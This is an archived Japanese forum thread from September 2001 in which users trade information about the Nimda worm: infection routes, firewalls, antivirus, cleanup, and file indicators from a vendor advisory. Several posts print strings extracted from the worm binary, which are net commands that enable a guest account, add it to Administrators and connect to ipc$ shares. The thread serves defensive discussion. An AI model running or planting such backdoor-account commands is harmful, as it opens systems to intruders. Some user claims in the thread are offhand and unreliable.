port80をオープンにして「\n\n」送り返すソフト作ったんだけど
30分で400アクセスあったよ

460 :名無しさん@お腹いっぱい。:01/09/19 23:46
>>458
確実に増えてる。
昨夜は14とか18だったのにね。

461 : :01/09/19 23:48
とりあえずこれ作ったヤツ逮捕されたら
全世界同時中継公開死刑

462 :名無しさん@お腹いっぱい。:01/09/19 23:48
ttp://www5.ocn.ne.jp/~sproom/sp.htm

463 :名無しさん@お腹いっぱい。:01/09/19 23:48
>>458
ワラタ

464 :名無しさん@お腹いっぱい。:01/09/19 23:48
これもCodeRedといっしょでIISに感染するんだよね?
鯖立てたマシンでネットサーフィンしてる奴とわけもなく送られてきた変なファイル実行する奴が沢山いたってことでいいの?

465 :名無しさん@お腹いっぱい。:01/09/19 23:49
>>451

そこがWeb公開されていたら、Linuxも感染したように外から見えるわけ?

466 :名無しさん@お腹いっぱい。:01/09/19 23:49
>>464
全然ダメだ

467 :名無しさん@お腹いっぱい。:01/09/19 23:50
営業に言われるがままにサーバーを導入して放置。
これ定説

468 :名無しさん@お腹いっぱい。:01/09/19 23:50
俺のノートパソのメモリ192メガのはずなのに、今見たら64メガしかない。
やられたの?

readme.emlとかは発見できなかったけど・・・

469 :名無しさん@お腹いっぱい。:01/09/19 23:50
ヴァカを承知で聞くけど、
Nimdaってマックにも感染するの?

470 :名無しさん@お腹いっぱい。:01/09/19 23:50
 さて、では愚痴も聞いてもらったし
レジストリBackUP取って順番に削るとするか

 爆弾の赤と青、どっちのコード切る?

471 :名無しさん@お腹いっぱい。:01/09/19 23:50
胡散臭いメールの添付ファイル実行する奴ってどんな奴なのよ?

472 :ナナシサソ:01/09/19 23:51
>>471
それは、>>469みたいな人とかです

473 :めるめる:01/09/19 23:51
>>431
windows2000付属のIISのログだよ
apacheでも同じだよ

474 :名無しさん@お腹いっぱい。:01/09/19 23:51
>>464
それはほんの一部。

475 :名無しさん@お腹いっぱい。:01/09/19 23:51
>>469
Macは感染しないよ。
相手にされていないから。

476 :(゚Д゚;):01/09/19 23:52
>>458
「出勤予定: 火曜日・水曜日・木曜日・土曜日・日曜日 店長の一言 1顔はおとなしめですがエッチが大好き。
いろんなプレイを楽しんでください。..」
・・このサマリー何処とは言わない(w
今、止まってる??

477 :名無しさん@お腹いっぱい。:01/09/19 23:53
感染した奴らって被害者面してっけど、不用意に添付ファイル開いたりJavaOnでネットしてたり、ちょっと不用意なんじゃないの?
企業や官庁が感染したって公表してんのって自分ら馬鹿ですって言ってるようにしか見えないんだけど。

478 :名無しさん@お腹いっぱい。:01/09/19 23:53
>>472
ヴァカにするならせめて教えてやれよ。根性悪いなお前。

479 :名無しさん@お腹いっぱい。:01/09/19 23:53
>>471
 ビル・ゲイツ

480 : :01/09/19 23:53
感染してるかどうかわからん奴は、
ネット切断したほうがいいぞ!
>>41 の方法で、何されるかわからんぞ!

481 :名無しさん@お腹いっぱい。:01/09/19 23:55
>>477
変なサイトまわったりしない一般の人間のアクティブスクリプトが
ONになっててもおかしくはない。つーか本来はそれが当然。
なんの為のJavaScriptなんだろうな・・・

482 :名無しさん@お腹いっぱい。:01/09/19 23:55
>>474
残りの大分はどうして感染したの?
コードレッドみたく妙なリクエストでオーバーフローさせてるわけじゃないでしょ?

483 :名無しさん@お腹いっぱい。:01/09/19 23:55
>>475

MacでWebサイト立ててて、そこWinとファイル共有してたら、Macからでも感染するんじゃねーの?

こういうのMacも感染て言わねぇ?

484 :名無しさん@お腹いっぱい。:01/09/19 23:56
というか、感染したのが大学ってのは情けない。

485 :名無しさん@お腹いっぱい。:01/09/19 23:56
IEのSP2ってセットアップファイルのみのダウンロードって
できるん?

486 :名無しさん@お腹いっぱい。:01/09/19 23:57
>>484
大学はザルだよ。
感染しても始末書も責任問題もない。
ネットワーク委員会の連中でログの見方が分かる奴もいない。

487 :名無しさん@お腹いっぱい。:01/09/19 23:57
>>480
readme.exe見てみればわかるけど、わざわざguest
ユーザーを追加してるのが怖いな

488 : :01/09/19 23:57
>>41
そうなのね。セキュリティ設定、、アカウント追加するね。
guest。
俺、2k鯖立てて無いけど、おもわづ確認した。

489 :名無しさん@お腹いっぱい。:01/09/19 23:57
あ?

>>41

ってことは、いま感染してるサイトのIP調べると、ログオンできちゃうと・・?

490 :名無しさん@お腹いっぱい。:01/09/19 23:57
うちの近くの大学もご臨終。

491 :名無しさん@お腹いっぱい。:01/09/19 23:57
>>483
いわねぇ

492 :名無しさん@お腹いっぱい。:01/09/19 23:58
>470
折角だから俺は赤のコードを選ぶぜ!!

…と、470は言って欲しかったものと思われ。俺も言いたかったからいいけど(w

493 :名無しさん@お腹いっぱい。:01/09/19 23:58
ホームページはMSNのままで、買ったときについてたIEをそのまま
使ってて、まっとうなサイトを見るのを楽しみにしてる人が被害者なのね・・・。

494 :名無しさん@お腹いっぱい。:01/09/19 23:59
>>477
 普通の企業の偉いさんは、仕事の知識と経験の換わりに
PCに関してはその通りですね。
 だからサーバーは無害 その下にぶら下がっているのは
凄惨を極めてますね。
 

495 :名無しさん@お腹いっぱい。:01/09/19 23:59
>>482
CodeRedIIなどが作ったバックドアから感染。

496 :名無しさん@お腹いっぱい。:01/09/20 00:01
>>482
社内PCのローカルファルダに日本語ファイル名.emlで置いてあったら
「これなんのファイルだっけ?」とプレビューするのが人間心理だよ。

497 : :01/09/20 00:02
ネスケでも感染するのかな?

498 : :01/09/20 00:03
ネットにつないでもすごく重くて、
オンラインスキャンに辿り着けず、
検索でreadme.exeを探そうとしても、めちゃくちゃ時間がかかります。
諦めてノートン買ったほうがいいですか?

499 :名無しさん:01/09/20 00:04
>>493
世の中、そんなもんです。

500 :名無しさん@お腹いっぱい。:01/09/20 00:04
久々にふぁっくじゃぱにいずこむスクリプトでも見てみるかな

501 :名無しさん@お腹いっぱい。:01/09/20 00:04
>>498
ノートン買うなら10月まで待て。

502 : :01/09/20 00:05
買っときなさい。
いい機会だ。
パッチも当てとくように。

503 :名無しさん@お腹いっぱい。:01/09/20 00:05
しっかし、なんでMSNのサーバがやられたのん?
パッチ当ててなかったのか?それがどーにもピンとこないんだわ。

504 :名無しさん@お腹いっぱい。:01/09/20 00:05
>>498
「mep」を検索してみろ。感染後はこれが膨れる。

505 :名無しさん@お腹いっぱい。:01/09/20 00:05
んじゃ感染してるかどうか確認すんのに、コンソールからゲストでログイン試すってのも有効だね。

506 :名無しさん@お腹いっぱい。:01/09/20 00:07
>>501
新バージョンまでまてとかゆー状況じゃないだろ。
そもそも、どれでもいいから AntiVirus ソフトひとつも入れてないって
やつは速攻で首をつるべし

507 :名無しさん@お腹いっぱい。:01/09/20 00:07
>>496
共有フォルダに"美由紀の日記.html"ってブラクラ置いておいたら被害者続出した。
結構ワラタ

508 :  :01/09/20 00:07
>>498
ワームは活動を開始するとマシン内のc:\Windows\tmpディレクトリに以下のファイルを作成します:

   ・c:\Windows\tmp\mep????.tmp
    (「?」は任意の半角英数字 例:mep1234.tmp)

   ・c:\ADMIN.DLL

この2つのファイルはワームが添付されたメールファイルです。

   ・c:\Windows\tmp\mep????.tmp.exe
    (「?」は任意の半角英数字 例:mep1234.tmp)

このファイルはワーム本体のプログラムファイルです。

 
次に、ワームは以下の方法で自身のコピーを頒布します:

509 :名無しさん@お腹いっぱい。:01/09/20 00:08
>>503
見つかってない感染ルートがあるんだろな

510 :名無しさん@お腹いっぱい。:01/09/20 00:08
>>506
注意して使って、頻繁に再インストールしてりゃワクチンなんかイラネーヨ。
それよりFW導入すべし。

511 :名無しさん@お腹いっぱい。:01/09/20 00:09
>>503
クライアントからの共有かFTPだろ

512 :名無しさん@お腹いっぱい。:01/09/20 00:09
>>491

ニムダ、Macから感染!な。

513 :496:01/09/20 00:09
>>507
今日の被害者は「お茶くみ当番.eml」だったらしい・・

514 :名無しさん@お腹いっぱい。:01/09/20 00:09
>>509
セキュリティホールはパッチ出来てから公開するのが通例ですね

515 :名無しさん@お腹いっぱい。:01/09/20 00:11
>>510
そのうちBIOSまで壊されるに一票

516 :名無しさん@お腹いっぱい。:01/09/20 00:11
自分は実害なしでヒトには感染させて「ホトシターヨ」か。気楽なもんだ>マカ>>491

517 :名無しさん@お腹いっぱい。:01/09/20 00:11
>>510
ポート80開いてりゃFW通過するよ。

518 :ビギナー:01/09/20 00:12
>261のリンクに入ったらノートンがこんなログ残していきました。

「日付: 2001/09/19 、 時刻: 23:49:42 、 既定 (OEMCOMPUTER 上)
ファイル
C:\WINDOWS\Temporary Internet Files\Content.IE5\IVQGY8JN\203.252.132[1].htm は
W32.Nimda.A@mm(html) ウィルスに感染していました。
ファイルは修復されました。」

WindowsMEとIE5.5SP2でスクリプトオフにしてもアンチウィルスソフト入れて
なければアウトってことですか?

519 :名無しさん@お腹いっぱい。:01/09/20 00:13
>>491 言い逃れしてねえで対策しろ>>マカ

520 :名無しさん@お腹いっぱい。 :01/09/20 00:14
>>518
いや、Norton は IE が脆弱性持ちのバージョンか否かに
かかわらず警告発しまっせ。

521 :名無しさん@お腹いっぱい。:01/09/20 00:14
>518
いや、キャッシュに残ってるhtmlファイルの中身に反応しただけだから
君は安全。

522 :>>371:01/09/20 00:14
>>518

> WindowsMEとIE5.5SP2でスクリプトオフにしてもアンチウィルスソフト入れて
> なければアウトってことですか?

さっきからそう言っている。

523 :名無しさん@お腹いっぱい。:01/09/20 00:15
>>510
FWは意味無いんだよ。
うちはFWが有るから安心だよガハハハ!ってところが軒並み感染してる
んじゃよ。
会社はちゃんと専任の管理者をつけて日々チェックしてないとダメよん。

524 :名無しさん@お腹いっぱい。:01/09/20 00:16
>>523
そだね。いったん内側から発生したらオシマイ

525 : :01/09/20 00:16
>>510
こーゆーセキュリティの基礎すらわかっていないDQNこそが最悪の加害者だな。

526 :名無しさん@お腹いっぱい。:01/09/20 00:17
>>522
アウトってことは無いんじゃない?
テンポラリーフォルダーに保管されても問題ないと思うのだが・・
確かにノートンは反応するけどね

527 :名無しさん@お腹いっぱい。:01/09/20 00:17
このくらい強力な感染力だとアンチウイルスソフトも
あんまし役に立たないけどなー

528 :名無しさん@お腹いっぱい。:01/09/20 00:18
>>510
今回は受動的攻撃だから、従来の Firewall で防御するのは難しいね。
Firewall を過信してるやつに限って感染するもんだよ。
クライアントもサーバーも、すべてのシステムがセキュアに維持
されるように心がけないとダメ。

529 :(´Д`;):01/09/20 00:19
>>518
キャッシュ。。。感染じゃないと思う。
俺はウイルス良く?落すけど、キャッシュ消すの忘れて
後でスキャンして反応出てから、苦笑いすること良くあ
るよ(w
取り合えず、キャッシュはマメに消しとく事。

530 :名無しさん@お腹いっぱい。:01/09/20 00:20
>>527
そんなこたーないだろ。
ユーザーがタコだと宝の持ち腐れってこった。

531 :>>371:01/09/20 00:20
>>526

スマソ、言い過ぎた。

でも、これが不意に開いたりしないんだろうか。
たとえばオフライン状態でこのキャッシュのサイト開いたらこのキャッシュが開くだろう。

だから、アンチウイルスソフト入れないとアウト、っていうのはそのとおりなのでは・・。

532 :518:01/09/20 00:20
>520,521
速攻でファイル検索したけど実害なくてよかったです。
ちょっとヒヤッとしました。
>522
それはホンマですか??コワッ!
入れててよかった…

533 : :01/09/20 00:20
winMXでも感染するんでしょうかね?

534 :名無しさん@お腹いっぱい。:01/09/20 00:20
>>526
今回のnimdaはパッチで十分だけど、アンチウィルス
ぐらい入れとけよってことでしょ

535 : :01/09/20 00:21
はっきりいってサーバーやられたがどうしようもないんで再インストール
した。patch当ててたつもりが1台だけ当たってなかった、不覚だった。
プロキシサーバだったんでクライアント全滅。

536 :名無しさん@お腹いっぱい。:01/09/20 00:21
超がいしゅつだと思うんですが
IE5.00はどうなの?

537 :名無しさん@お腹いっぱい。:01/09/20 00:21
>>531
んなこたぁない

538 :_:01/09/20 00:21
CodeRed の時もそうだったけど、社内に持ち込まれた感染ノート
PC から社内 LAN に一気に広がったところが今回も結構あったんじゃないかな?
まぁ、いずれにしても、今時 Firewall おいてあるから大丈夫なんて
呑気なこと言ってる奴は逝ってヨシ。

539 :名無しさん@お腹いっぱい。:01/09/20 00:23
>>523-528
ここらへんの意見が一致したので少し安心した。
セキュリティを維持する事の大変さと重要性を知るのに良い機会になるかな。

今回は無数にある穴の一つをつかれただけに過ぎない事を忘れずに。
まだまだこれからじゃよー。

540 :526:01/09/20 00:25

>534
まあそういうことなら、同意
ただ、わかってない人を必要「以上」にビビラセルのもどうかと

でも難しいよね
初心者って必要以上にウイルスに関してビビル一方で
わかっている人間から見たら考えられないぐらい危険なことを平気でやったりする。

バランスの問題かな。

541 : :01/09/20 00:26
systemフォルダのload.exeと隠しファイルのloadファイル、および
書き換えられたriched20.dllがいろいろやってるっぽいんだがどう?

system.iniのshellの行を元にもどしても、すぐに再起動しないと
また書き換えらる。system.iniファイルを常に監視でもしてんのか?

542 :名無しさん@お腹いっぱい。:01/09/20 00:26
>>539
違う。もう一度このスレ読むべし。

543 : :01/09/20 00:27
>>539
つーか>>510がバカすぎなだけ。
近頃のウイルスやワームはファイアウォールがあるのは前提で、空けられているポート
(80や25)をねらってくるのは当たり前。
まともな管理者ならファイアウォールが気休めに過ぎないのは常識。

544 :名無しさん@お腹いっぱい。:01/09/20 00:27
サイバーテロとの噂の真相はどうですか?
FBIも調べてるみたいですが

545 :518のビギナー:01/09/20 00:27
>>529
了解です。
なんかNimbaに出会ってネットの怖さを始めて知ったような
気がしました。

546 :名無しさん@お腹いっぱい。:01/09/20 00:29
Mac,winMX,IE5.00,
結局感染するかどうか誰も答えられないの?

547 :ななしさん:01/09/20 00:29
自分と同じ第一オクテットに攻撃してるとすると
第一が192とか172のグローバルもってるやつは
すごいことのになってそうだね。
それともプライベートだと処理変えたりするのかなあ。
たまにくる第一オクテットが違うやつがそれだったりして。

548 :526:01/09/20 00:29
>まぁ、いずれにしても、今時 Firewall おいてあるから大丈夫なんて
>呑気なこと言ってる奴は逝ってヨシ
禿げしく同意!
まあ厨房管理者でしょ、そういうこと言ってるのは、企業の管理者が
そういうことを逝ってないことを祈る・・
クライアント使用者は厨房(つーか初心者)であることを前提に
管理者だけでもしっかりせんといかんな。

549 :名無しさん@お腹いっぱい。:01/09/20 00:30
<問一>
readme.exeが検索で見つかった。
削除した。
もう平気か?

550 :名無しさん@お腹いっぱい。:01/09/20 00:30
>>546
(゚Д゚)ハァ?

551 :名無しさん@お腹いっぱい。:01/09/20 00:30
510だけどなんでそんな叩かれなきゃいけないんだ?
ワクチンなんかより頻繁にHD初期化すんのが一番の対策だろ。
ファイヤーウォール過信してるわけじゃないが、マカフィーやらウィルスバスターやらなんかよりはよっぽど効果的だと思うが。
PFWね。

552 :感染:01/09/20 00:30
>>546
Mac:×
WinMX:○(zipやexeファイルに感染)
IE5.0:○(javascriptでreadme.eml読まれてあぼ〜ん)

553 :名無しさん@お腹いっぱい。:01/09/20 00:31
マック7600/200、愛E5.0
感染しません。見捨てられました。

554 :名無しさん@お腹いっぱい。:01/09/20 00:31
>>546
過去ログ見れ

555 :名無しさん@お腹いっぱい。:01/09/20 00:31
WIN-XP出たら、どうなる事やら。。。
俺は、リモートデスクトップ絶対捨てる。
捨てたら動かないなんて言うなよな>My糞。

556 :名無しさん@お腹いっぱい。:01/09/20 00:31
>それともプライベートだと処理変えたりするのかなあ。

プライベートでも同じみたいですよ。

557 :名無しさん@お腹いっぱい。:01/09/20 00:32
>>546

MacでWebサイト立ててて、そこ感染Winとファイル共有してたら、Macからでも感染すると思う。

でもMacが感染とは言わないらしい。Macから感染。

558 : :01/09/20 00:32
>>551
A.クソバカだから
いいから氏ねって。

559 :名無しさん@お腹いっぱい。:01/09/20 00:32
>>551
みんな頻繁に初期化してるほど暇じゃないんだよ

560 :名無しさん@お腹いっぱい。:01/09/20 00:32
IE5.00なんて今更使う必要ないでしょ・・・
更新しとけ

561 :名無しさん@お腹いっぱい。:01/09/20 00:33
IE5.00のことをIE5.0と表記するから混乱する

562 :名無しさん@お腹いっぱい。:01/09/20 00:33
>>555
俺もずっと前からそう思ってた。ついでにデフォルト付属の
ファイヤーウォール機能も使わない

563 :名無しさん@お腹いっぱい。:01/09/20 00:33
>>552
ありがとうございます。

564 :名無しさん@お腹いっぱい。:01/09/20 00:33
>>551
最近どっかのMLで
「マシンの調子が悪くなったら原因究明するよりマシン交換が先!
現場優先! システム部なんて経費だけ食って役にたたねえ!」
という趣旨の発言をした奴を思い出しました。

565 :名無しさん@お腹いっぱい。:01/09/20 00:34
>>551
話にならねえょ。

566 :名無しさん@お腹いっぱい。:01/09/20 00:34
>>551
まあまあそういわずに。
企業サーバーの管理者ですか?
それとも自宅サーバー?
本当に頻繁にHD初期化する運用してるの?
それはそれですごいけど・
マカフィーやらウィルスバスターをなぜそこまで信用しないの?

とりあえず510が叩かれまくったのはFWの件だと思うんだけど

567 :_:01/09/20 00:34
>>555
捨てるっつーか、接続許可しなければ動かないみたいよ。
それに、リモートデスクトップは単一のTCPポート使うだけなんで
Firewall で閉めるのも楽。

っつーか、SOAP とか何とか最近みんな TCP port 80 に重ねすぎ!
Firewall でフィルタできなくなるじゃねぇかゴルァ!

568 : :01/09/20 00:34
>>559
パッチ当てたくらいで安心してんのか?疑わしきは再インストールは常識だと思うが。

569 :名無しさん@お腹いっぱい。:01/09/20 00:34
>>551

Webを1ページ見るたびに再インストールしろや

570 :ななし:01/09/20 00:35
>>548
プライベートからは全部プロクシ経由にして、一般PCから外部への
アクセスはシャットダウンすれば外部に被害をあたえる事は避け
られるね。(実際そうやってるとこも多い)
これからは内から外へのアクセスも制限するようになるかも。
住みにくい時代だ。

571 :名無しさん@お腹いっぱい。:01/09/20 00:36
ゲイツは謝罪しる!!

572 : :01/09/20 00:36
>>551
うーん、チミのやり方で確実に防げるとすれば、再起動前に必ず
フォーマット掛ける設定しとかないとダメだね。
ある意味、こんな設定はウイルス指定。

573 :名無しさん@お腹いっぱい。:01/09/20 00:36
>>568
君、その調子じゃどんなソフトも使えないね

574 :ほね:01/09/20 00:36
ユーザーアカウント追加するコードってどこだ?無いような気がするが。
ソース追っかけるのってこんなに大変なのか・・・うひぃ

575 :名無しさん@お腹いっぱい。:01/09/20 00:37
>>568
ムキになんなさんなって・
論点ずれちゃってるよ・

576 : :01/09/20 00:37
>>564
そーか、最近は、ハードの値段安いからな。
管理者の人件費は、PC何台位になるのかな?

577 :572:01/09/20 00:37
>>568
確かに、感染してからパッチ当ててたんじゃ意味なし。
同意。

578 :名無しさん@お腹いっぱい。:01/09/20 00:38
>>572

これでは不十分。

>>551 方式なら1ページ見るたびにフォーマット・再インストール。

579 :名無しさん@お腹いっぱい。:01/09/20 00:38
>>574
GUESTを追加するって奴?
GUESTってローカルコンピュータのビルトインアカウントだったりすので
勘違いかも、という気が今強くしてる。

580 :名無しさん@お腹いっぱい。:01/09/20 00:38
>>574
既出だったらスマンが、ソースコードどっかに上がってる?

581 :名無しさん@お腹いっぱい。:01/09/20 00:38
>>571
使用許諾に同意できんのなら返品すりゃいい。

582 :ゲイツ:01/09/20 00:38
>>571
     _____
    /_      |
    /. \ ̄ ̄ ̄ ̄|
  /  /  ― ― |
  |  /    -  - |
  ||| (6      > |
 | | |     ┏━┓|   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| | | |     ┃─┃|  < 正直、スマンかった。
|| | | |  \ ┃  ┃/    \________
| || | |    ̄  ̄|

583 :名無しさん@お腹いっぱい。:01/09/20 00:40
>>578
しかもすべてのドライブを・・・ってことになる。
何のデータも保存できないマシンになりますな。

584 :名無しさん@お腹いっぱい。:01/09/20 00:40
readme.exeからstring(実はtdump)で文字列切り出したものの一部

38137: user guest ""
38153: localgroup Administrators guest /add
38193: localgroup Guests guest /add
38225: user guest /active
38245: open
38253: user guest /add

585 :名無しさん@お腹いっぱい。:01/09/20 00:41
>>570
>プライベートからは全部プロクシ経由にして、一般PCから外部への
>アクセスはシャットダウンすれば外部に被害をあたえる事は避け
>られるね。(実際そうやってるとこも多い)
企業LANであれば、これは基本(と俺はおもってる)
さらにプロキシでのウイルススキャン(htmlすべて)を
行う、さらに外部からのメールの受信もすべてスキャンする。
これで、かなり守れると思う。
といいつつ、上記すべて行っているのに
うちの会社LAN内感染しました
フロッピーで持ち込まれたらお手上げ・

586 :名無しさん@お腹いっぱい。:01/09/20 00:42
>>585
ユーザは何とかしてNimdaを持ち込もうと管理者の隙を衝くわけですな。

587 :570:01/09/20 00:42
>>すんません
シャットアウトね
いきなりシャットダウンはねーだろ
(自分ツッコミ)

588 :名無しさん@お腹いっぱい。:01/09/20 00:43
このウィルス、バグあるみたいね。

私のパソコンでウィルス実行したら、ウィルス自体がハングアップしてる。
ワトソン博士のログにも、残ってる・・・

589 : :01/09/20 00:43
>>570
でも、こんなのは?
添付ファイルで送られてくる。ダブルクリックで感染。HDD(ネットワーク共有含む)上
のdocやtxt、htmlファイルをスキャンしてメールアドレスを抽出。ネットワーク上のSMTP
サーバーを探して接続。スキャンしたメールアドレスに自分自身を添付して自動送信。
メールを使うなとはなかなか言えないと思うが。もちろんオプションとしてMAPIやNotes
のAPIをたたいたって構わない。

590 :名無しさん@お腹いっぱい。:01/09/20 00:43
一応社内マシンにパッチ当ててきたけど、明日また感染マシンが増えてたらどうしよう・・・

591 :>>371:01/09/20 00:44
>>537

かしいなぁ。

やはり入ってくる。ノートンインターネットセキュリティー動作させているのにどこから入ってくるんだ?

アンチウイルスで駆除済みにしているのに・・。

Win2KSP2にしていても、だ・・。

592 :名無しさん@お腹いっぱい。:01/09/20 00:44
>>587
Yahooを開こうとしただけで電源を切られるとは厳しいポリシーですね

とか言おうと思ったのに

593 :きよふる:01/09/20 00:44
>>564
氏ね

594 :579:01/09/20 00:45
>>584
うわーお。本当だったのか…

595 :名無しさん@お腹いっぱい。:01/09/20 00:45
>>589
メールサーバで添付ファイルのフィルタリングは、
今後主流になるだろうね。

596 :564:01/09/20 00:47
>>593
>氏ね

俺が? この発言した奴が? それとも他の誰か?

597 :名無しさん@お腹いっぱい。:01/09/20 00:49
>>590
バット振り回してWindowsマシンを破壊してください

598 :564:01/09/20 00:50
>>593
名前見てなかったよ。
ご本人でしたか。

599 :名無しさん@お腹いっぱい。:01/09/20 00:51
>>595

余談だけど、DoCoMo.ne.jpもやってくれないかな。

FromがRFC準拠じゃなかったら削除とか(苦笑)

600 :名無しさん@お腹いっぱい。:01/09/20 00:52
>>594
追記

40073: net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"

まさに・・・

601 :名無しさん@お腹いっぱい。:01/09/20 00:53
ドキュモは通信の秘密とかあるからね・・・・
しばらくダメかと。

602 :名無しさん@お腹いっぱい。:01/09/20 00:53
>597
http://camaross.net/video/badday3.mpg
こんなふうに?(w
・・・つっても、だれもリンク見にいかないんだろうなぁ。

603 :(・・):01/09/20 00:54
>>580
感染サーバから落とした。
readme.eml、base64デコードして、ソース見てみると
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security share c$=c:\ user guest ""
localgroup Administrators guest /add localgroup Guests guest /add user guest /active open
user guest ・・・この辺なのかな〜。
#\CurrentControlSet\Services\[lanmanserver]\Shares\Security share
マカフィーのサイトだと[lanmanserver]の値消すって書いてあったけど。。
違うみたい??

604 :名無しさん@お腹いっぱい。:01/09/20 00:54
イもーどはメルアドに半角カナを採用すりゃいい。

605 :名無しさん@お腹いっぱい。:01/09/20 00:55
>>551 は「感染予防」を必要としないのでしょうきっと。

感染したらフォーマット。ある意味それがいいのかもしれんが、まず感染しない
事が最重要。そのためにもアンチビールスソフトは必要。

新しいワームやウィルスに注意を払うのは当然のこと。
そのためにもFWや監視、情報収集は必要。

クライアントのことを考えると最悪一発目食らっても2次感染3次感染予防の為
にも、出来る限りの防御策をとっておくべきでないか?

606 :名無しさん@お腹いっぱい。:01/09/20 00:55
>>602
最後窓から放りなげるやつかな(w
うっ 落ち言ってしもうた・・・

607 :603:01/09/20 00:55
>>584
げっ、被りまくり。。。
感染させて逝きます。。。

608 :名無しさん@お腹いっぱい。:01/09/20 00:57
Nimdaってなんて読むのが正しいの。ニムダ?
さっきシステム管理課のやつらと行ったカラオケで、リンダリンダを
ニンダニンダって絶叫してた俺って恥?

609 :名無しさん@お腹いっぱい。:01/09/20 00:58
>>608
逆から読むと・・・アドミン。
確かにアドミンだわ。。。勝手にユーザー追加して。

610 :名無しさん@お腹いっぱい。:01/09/20 00:59
>>603

> #\CurrentControlSet\Services\[lanmanserver]\Shares\Security share
> マカフィーのサイトだと[lanmanserver]の値消すって書いてあったけど。。
> 違うみたい??



こんなのばっかじゃまかふぃー信じらんないよ(´Д`;)

McAfeeウィルス対策をコピペでぱくる
http://slashdot.jp/article.pl?sid=01/08/21/0428210

611 :    :01/09/20 00:58
>>608
過去レスで「ニダ」って出てたけど
ニュースでは「ニムダ」だね。

612 :  :01/09/20 00:59
以下はトレンドマイクロのコピペだ

ワームは活動を開始するとマシン内のc:\Windows\tmpディレクトリに以下のファイルを作成します:

   ・c:\Windows\tmp\mep????.tmp
    (「?」は任意の半角英数字 例:mep1234.tmp)

   ・c:\ADMIN.DLL

この2つのファイルはワームが添付されたメールファイルです。

   ・c:\Windows\tmp\mep????.tmp.exe
    (「?」は任意の半角英数字 例:mep1234.tmp)

このファイルはワーム本体のプログラムファイルです。
いいか?わかると思うが、これが見つかったら、活動をはじめているって事だぜ!
とあるから、手動で検索するやつは、↑も検索シレ。

613 :名無しさん@お腹いっぱい。:01/09/20 00:59
さっきのreadme.exeから文字列をtdumpで切り出したやつ

http://members.jcom.home.ne.jp/hangedman/readme_exe.txt

30000ぐらいから読める文字列

そういやこれってSMTPクライアントでもあるようだけど、
メール送られたって人まだいないね。Subjectとかどうなるのやら

614 :名無しさん@お腹いっぱい。:01/09/20 01:00
>>608
「システム管理課」のやつらと「さっき」カラオケに行けたこと
自体が羨ましく感じてみたり。

615 :名無しさん@お腹いっぱい。:01/09/20 01:01
>>602

これ知ってるo(^^)o

おれもやりたい(ぉぃ

616 :名無しさん@お腹いっぱい。:01/09/20 01:01
>>613
強烈に長い無意味なカタカナの羅列が来てました

617 :名無しさん@お腹いっぱい。:01/09/20 01:02
>>605
感染予防なんてやって当然であって、改めて言うことじゃない。
>新しいワームやウィルスに注意を払うのは当然のこと。
>そのためにもFWや監視、情報収集は必要。
は同意。
>クライアントのことを考えると最悪一発目食らっても2次感染3次感染予防の為
>にも、出来る限りの防御策をとっておくべきでないか?
と思うなら、万全の対策をした上でHDを初期化し再び対策をするのがベストでは?
対策ってのはあくまで一つの可能性を排除しただけで未知の穴つかれてる可能性だってゼロじゃないんだから。
違うかい?

618 :名無しさん@お腹いっぱい。:01/09/20 01:04
>>616
あっ、そうか、感染してるとディレクトリの階層ごとにメールが
来たりするんだっけ。ふむ、そんな怪しい感じになるのか

619 :名無しさん@お腹いっぱい。:01/09/20 01:04

 ( ̄ ̄ ̄)
  [ ((★))]
 <丶`∀´>  <うまくいってるニダ!
 (''  : '')
 │| | |
 〈_フ__フ

620 :名無しさん@お腹いっぱい。:01/09/20 01:05
>>617
パッチのインストールをためらうような管理者がそんなことやる訳ねーだろ(藁

621 :名無しさん@お腹いっぱい。:01/09/20 01:05
Winとの共有Webフォルダのニムダ、Macのまかふぃーじゃ最新パラメータにしても発見出来ねーよ(´Д`;)

622 :名無しさん@お腹いっぱい。:01/09/20 01:07
>>617
未知の穴はフォーマットしようがHDD新品にしようがだめだろ。

623 :  :01/09/20 01:10
61.74.124.119

とかから、アクセスがずうっとあるんだけどさ、
これって、関係ある?
Asia Pacific Network Information Center
全部ココ↑

624 :名無しさん@お腹いっぱい。:01/09/20 01:12
>>623
Korea TelecomのADSLユーザだな。

625 :623:01/09/20 01:13
>>624
クラック?

626 :名無しさん@お腹いっぱい。:01/09/20 01:13
>>510=>>551=>>617
>注意して使って、頻繁に再インストールしてりゃワクチンなんかイラネーヨ。
こんなイタイこと言っといて、今さらなに言ってもダメ。
いいから氏ねって。

627 :名無しさん@お腹いっぱい。:01/09/20 01:15
>>623
君んトコのIPが61.*.*.*なのでは。
どこに繋いでんの?

628 :名無しさん@お腹いっぱい。:01/09/20 01:15
http://isweb24.infoseek.co.jp/computer/titikun/CRhuri.htm
わかんねーやつはえ〜ん氏のページでも見ろ。

629 :名無しさん@お腹いっぱい。:01/09/20 01:16
第一オクテットが211系から210系に変わったとたんに
Nimdaの攻撃が激減した

211系は韓国系が多かったけど
210系は台湾系が多い

630 :623:01/09/20 01:17
>>627
オレはAirH”でPRINなんだけど、
61.*.*.*
だよ、関係ないの?

631 :名無しさん@お腹いっぱい。:01/09/20 01:20
今、ノートン先生のLiveUpdateしたら、
ウィルス定義が2001/09/18になった。
"2001/09/19"じゃないの?

632 :名無しさん@お腹いっぱい。:01/09/20 01:20
そうか、ニムダは鯖・蔵両方に感染するから、話も混同されてしまうんだな。

633 :名無しさん@お腹いっぱい。:01/09/20 01:21
>>632
何をいまさら

634 :名無しさん@お腹いっぱい。:01/09/20 01:24
だれだよ、Macは感染しないって言ったの!

Web共有でパッチMacに置いて配ったら社内中に撒いちまってたよ(´Д`;)

635 :  :01/09/20 01:24
結局は、ディープな海外ウイルスサイトなんかも有効な情報元。
リンク辿れば、パッチ出る前に穴公開?されてる事有るし。
アプされてから、3ヶ月ぐらい経って流行したのはmagistr。

636 :名無しさん@お腹いっぱい。:01/09/20 01:25
>>631
それでいいんだよ。

637 :>>634:01/09/20 01:26
>>491

なんとか言えよ!(´Д`;)

638 :ほね:01/09/20 01:27
>>603
あ、netコマンドのコマンドラインだこれ。
ううぬ。APIじゃなかったノカー。

やっぱ素人仕事はダメだねー。がんばれSymantec。

639 :名無しさん@お腹いっぱい。:01/09/20 01:27
>>634
意味が違うだろ

640 :627:01/09/20 01:28
>>630=623
すこし前の方読むことを奨めるのだけれども、
要するに第1オクテット(この場合61)が同じとこに
